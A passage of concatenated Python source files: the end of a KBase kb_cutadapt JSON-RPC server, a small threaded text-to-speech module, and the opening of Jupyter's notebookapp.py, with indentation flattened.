def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_cutadapt'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_cutadapt.remove_adapters,
name='kb_cutadapt.remove_adapters',
types=[dict])
self.method_authentication['kb_cutadapt.remove_adapters'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.exec_remove_adapters,
name='kb_cutadapt.exec_remove_adapters',
types=[dict])
self.method_authentication['kb_cutadapt.exec_remove_adapters'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.exec_remove_adapters_OneLibrary,
name='kb_cutadapt.exec_remove_adapters_OneLibrary',
types=[dict])
self.method_authentication['kb_cutadapt.exec_remove_adapters_OneLibrary'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.status,
name='kb_cutadapt.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_cutadapt ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
tts.py
|
from __future__ import annotations
import threading
import time
from queue import Queue
from typing import Callable, List, Tuple
import accessible_output2.outputs.auto
from .log import exception
class _TTS:
_end_time = None
def __init__(self, wait_delay_per_character):
self.o = accessible_output2.outputs.auto.Auto()
self._wait_delay_per_character = wait_delay_per_character
def IsSpeaking(self):
if self._end_time is None:
return False
else:
return self._end_time > time.time()
def Speak(self, text):
self.o.output(text, interrupt=True)
self._end_time = time.time() + len(text) * self._wait_delay_per_character
def Stop(self):
self.o.output("", interrupt=True)
self._end_time = None
_tts = None
_is_speaking = False
_queue: Queue[Tuple[Callable, List]] = Queue()
def is_speaking():
return _is_speaking
def _speak(text):
with _lock:
try:
_tts.Speak(text)
except:
exception("error during _tts.Speak('%s')", text)
def speak(text: str):
global _is_speaking
assert isinstance(text, str)
_queue.put((_speak, [text]))
_is_speaking = True
def _stop():
with _lock:
if _is_speaking:
try:
_tts.Stop()
except:
pass # speak() will have a similar error and fall back to sounds
def stop():
global _is_speaking
_queue.put((_stop, []))
_is_speaking = False
def _init_com_for_this_thread():
try:
import pythoncom
except ImportError:
pass
else:
pythoncom.CoInitialize()
def _loop():
_init_com_for_this_thread()
while True:
cmd, args = _queue.get()
if not _queue.empty():
# print("skipped!", cmd, args)
continue
try:
cmd(*args)
except:
exception("")
def _loop2():
# assertion: this thread never uses COM
# no need to call _init_com_for_this_thread()
global _is_speaking
while True:
if _is_speaking:
time.sleep(0.1)
with _lock:
if not _tts.IsSpeaking():
_is_speaking = False
time.sleep(0.1)
def init(wait_delay_per_character):
global _tts, _lock
_lock = threading.Lock()
_tts = _TTS(wait_delay_per_character)
t = threading.Thread(target=_loop)
t.daemon = True
t.start()
t = threading.Thread(target=_loop2)
t.daemon = True
t.start()
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# check for tornado 3.1.0
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
from .traittypes import TypeFromClasses
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch another
# list of servers and ensure our server is not in the list before
# sending the wrong impression.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
